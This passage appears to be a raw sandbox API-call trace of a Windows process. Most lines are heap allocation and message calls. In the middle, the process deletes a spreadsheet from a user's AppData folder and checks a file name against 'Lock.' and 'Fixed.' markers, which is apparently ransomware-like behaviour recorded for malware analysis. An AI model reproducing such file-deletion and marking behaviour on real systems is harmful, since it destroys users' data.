dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0225.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.227] CloseHandle (hObject=0x2d0) returned 1 [0225.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0225.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0225.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.231] CloseHandle (hObject=0x2a0) returned 1 [0225.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0225.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0225.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0225.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee7350 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0225.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0225.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0225.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0225.240] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0225.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0225.240] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bbPMuZmaU.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx", lpFilePart=0x8cedf4*="bbPMuZmaU.xlsx") returned 0x2e [0225.240] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bbpmuzmau.xlsx")) returned 0x20 [0225.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6857e010, ftCreationTime.dwHighDateTime=0x1d5f05a, ftLastAccessTime.dwLowDateTime=0xc7b46ee0, ftLastAccessTime.dwHighDateTime=0x1d5efa9, ftLastWriteTime.dwLowDateTime=0xc7b46ee0, ftLastWriteTime.dwHighDateTime=0x1d5efa9, nFileSizeHigh=0x0, nFileSizeLow=0x14995, dwReserved0=0x1, dwReserved1=0x1c, cFileName="bbPMuZmaU.xlsx", cAlternateFileName="BBPMUZ~1.XLS")) returned 0xa87250 [0225.241] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bbpmuzmau.xlsx")) returned 1 [0225.284] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6857e010, ftCreationTime.dwHighDateTime=0x1d5f05a, ftLastAccessTime.dwLowDateTime=0xc7b46ee0, ftLastAccessTime.dwHighDateTime=0x1d5efa9, ftLastWriteTime.dwLowDateTime=0xc7b46ee0, ftLastWriteTime.dwHighDateTime=0x1d5efa9, nFileSizeHigh=0x0, nFileSizeLow=0x14995, dwReserved0=0x1, dwReserved1=0x1c, cFileName="bbPMuZmaU.xlsx", cAlternateFileName="BBPMUZ~1.XLS")) returned 0 [0225.284] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0225.285] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0225.285] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0225.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e564e0 [0225.286] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bbPMuZmaU.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx", lpFilePart=0x8cf650*="bbPMuZmaU.xlsx") returned 0x2e [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0225.286] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bbPMuZmaU.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bbpmuzmau.xlsx")) returned 0xffffffff [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0225.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0225.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bfVxZ90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fVxZ90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VxZ90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xZ90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="90.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0225.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0225.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bfVxZ90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fVxZ90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VxZ90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xZ90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0225.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="90.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0225.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0225.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 